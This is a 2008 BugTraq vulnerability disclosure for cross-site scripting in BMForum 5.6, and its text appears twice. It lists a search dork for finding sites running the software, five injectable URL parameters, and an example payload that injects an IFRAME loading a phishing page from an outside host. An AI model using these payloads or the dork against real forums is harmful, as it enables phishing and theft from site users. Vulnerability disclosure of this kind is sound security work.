BugTraq
Back to list
|
Post reply
BMForum Remote 5.6 Miltiple XSS Vulnerability
May 22 2008 01:12PM
tan_prathan hotmail com
==========================================================
BMForum Remote 5.6 Miltiple XSS Vulnerability
==========================================================
AUTHOR : CWH Underground
DATE : 22 May 2008
SITE : www.citec.us
#####################################################
APPLICATION : BMForum
VERSION : 5.6 (Lastest Version)
VENDOR : http://downloads.sourceforge.net/bmforum
#####################################################
DORK: "powered by BMForum"
---Exploit---
[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copy
right=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandprona
me=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS
>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<X
SS>
--- Note ---
Very Dangerous for using 'IFRAME' TAG for Phishing Techniques
Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">
.
##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C #
##################################################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
BMForum Remote 5.6 Miltiple XSS Vulnerability
==========================================================
AUTHOR : CWH Underground
DATE : 22 May 2008
SITE : www.citec.us
#####################################################
APPLICATION : BMForum
VERSION : 5.6 (Lastest Version)
VENDOR : http://downloads.sourceforge.net/bmforum
#####################################################
DORK: "powered by BMForum"
---Exploit---
[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copy
right=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandprona
me=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS
>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<X
SS>
--- Note ---
Very Dangerous for using 'IFRAME' TAG for Phishing Techniques
Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">
.
##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C #
##################################################################
[ reply ]